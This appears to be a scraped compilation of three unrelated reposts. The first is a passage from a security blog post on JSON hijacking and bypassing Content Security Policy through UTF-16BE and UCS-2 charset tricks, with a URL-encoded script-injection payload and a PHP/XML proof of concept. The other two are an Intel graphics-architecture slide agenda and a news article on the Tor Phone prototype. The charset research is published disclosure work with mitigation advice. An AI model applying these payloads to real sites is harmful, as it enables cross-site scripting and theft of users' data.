feeds without proxies PoC Bypassing CSP As you might have noticed a UTF-16BE converted string will also convert new lines to non-ASCII variables, this gives it potential to even bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that injects into itself, has an encoded assignment and payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference same domain (which is the majority of policies). The HTML document will have to look like this: <!doctype HTML><html> <head> <title>Test</title> <?php echo $_GET['x']; ?> </head> <body> </body> </html> Notice there is no new line after the doctype, the HTML is constructed in such a way that it is valid JavaScript, the characters after the injection don't matter because we inject a trailing single line JavaScript comment and the new lines are converted too. Note that there is no charset declared in the document, this isn't because the charset matters it's because the quotes and attributes of the meta element will break the JavaScript. The payload looks like this (note the tab is required in order to construct a valid variable) <script%20src="index.php?x=%2509%2500%253D%2500a%2500l%2500e%2500r%2500t%2500(%25001%2500)%2500%253B%2500%252F%2500%252F"%20charset="UTF-16BE"></script> Note: This has been patched on later versions of PHP, it defaults to the UTF-8 charset for text/html content type therefore prevents attack. However I've simply added a blank charset to the JSON response so it still works on the lab. CSP bypass using UTF-16BE PoC Other charsets I fuzzed every browser and charset. Edge was pretty useless to fuzz because as mentioned previously does some sort of charset sniffing and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating especially because the dev tools let you filter the results of console by a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable but it is even more brittle than the UTF-16BE. Still I managed to get the following XML to import correctly on Chrome. <root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window) && typeof window===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root> The above no longer works in Chrome but I've included it as another example. UTF-16 and UTF-16LE looked useful too since the output of the script looked like a JavaScript variable but they caused invalid syntax errors when including a doctype, xml or a JSON string. Safari had a few interesting results too but in my tests I couldn't get it produce valid JavaScript. It might be worth exploring further but it will be difficult to fuzz since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively. CSS You might think this technique could be applied to CSS and in theory it should, since any HTML will be converted into non-ASCII invalid CSS selector but in reality browsers seem to look at the document to see if there's a doctype header before parsing the CSS with the selected charset and ignore the stylesheet, making a self injected stylesheet fail. Edge, Firefox and IE in standards mode also seem to check the mime type, Chrome says the stylesheet was interpreted but at least in my tests it didn't seem that way. Mitigation The charset attacks can be prevented by declaring your charset such as UTF-8 in an HTTP content type header. PHP 5.6 also prevent these attacks by declaring a UTF-8 charset if none is set in the content-type header. Conclusion Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response. Enjoy - @garethheyes Posted by Gareth Heyes at 10:03 AM Sursa: http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html

Agenda 1. Introduction (Jason) 2. Compute Architecture Evolution (Jason) 3. Chip Level Architecture (Jason)  Subslices, slices, products 4. Gen Compute Architecture (Maiyuran)  Execution units 5. Instruction Set Architecture (Ken) 6. Memory Sharing Architecture (Jason) 7. Mapping Programming Models to Architecture (Jason) 8. Summary Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf

The Tor Phone prototype: a truly private smartphone? 29 NOV 2016 Get the latest security news in your inbox. by Bill Camarda The Tor Project has long offered high-security alternatives for folk who are especially concerned about their privacy. But as the world goes mobile, and is increasingly accessed through smartphones, users become vulnerable to a whole new set of compromises. That’s where the Tor Phone prototype comes in – and it’s just been significantly improved. According to developer Mike Perry, Tor Phone aims: …to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users. It’s also “meant to show that it is still possible to replace and modify your mobile phone’s operating system while retaining verified boot security – though only just barely”. Tor Phone starts with Copperhead OS, an open-source Android fork focused on security. As Perry writes: Copperhead is also the only Android ROM that supports Verified Boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions… Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected). Therein lies a huge obstacle to Tor Phone deployment, however. Together with Copperhead, Tor Phone installs the Orbot Tor proxy app, OrWall firewall, F-Droid alternative app repository, additional tools, and finally, Google Play (primarily, Perry says, so you can retrieve the Signal app for encrypted voice calling and instant messaging). Its components must install to the system partition. Therefore, says Perry: We must re-sign the Copperhead image and updates… to [maintain] system integrity from Verified Boot. Unfortunately, only selected Google Nexus/Pixel devices let users control this with their own keys, while still supporting Verified Boot. So you can’t do this with your own cheap-o Android device, no matter how strong your Linux and related skills are – what’s more, a quick look at the directions confirms that setting up Tor Phone is non-trivial. You can jumpstart the process by purchasing a smartphone with Copperhead pre-installed – for the moment, of course, while supplies last. And, with the right hardware, says Perry, Tor Phone works: notwithstanding some “rough edges,” he relies on his right now. Sophos Home Free home computer security software for all the family Learn More Why bother with all this? Perry and Tor argue that Google is increasingly moving to lock down the Android platform, claiming it’s the only way to overcome Android’s “fragmentation and resulting insecurity”. Tor argues instead for a strategy based on transparency: [As] more components and apps are moved to closed source versions, Google [reduces] its ability to resist the demand that backdoors be introduced. Those might come from nefarious governments, of course. But, in Ars Technica, Perry notes that untraceable backdoors might also be introduced by hackers purely interested in financial gain. This is less likely, he argues, if a mobile OS remains fully open… We are concerned that the freedom of users to use, study, share, and improve the operating system software on their phones is being threatened. If we lose these freedoms on mobile, we may never get them back. For Tor Phone to gain traction, it’ll probably need to run on more than a couple of high-end devices manufactured by Google itself. In Ars Technica, Perry stresses that Tor won’t enter the secure hardware business. But someone could, he says, citing the crowdfunded Neo900 project as a model: What I’ve found is that posts like [his Tor Phone update] energise the Android hobbyist/free software ecosystem, and make us aware of each other and common purpose. If you’re thinking “sounds like there’s a long way to go,” Perry might agree. He named his current prototype “Mission Improbable”. But that’s big progress: he named the previous prototype “Mission Impossible”. Follow @NakedSecurity Sursa: https://nakedsecurity.sophos.com/2016/11/29/the-tor-phone-prototype-a-truly-private-smartphone/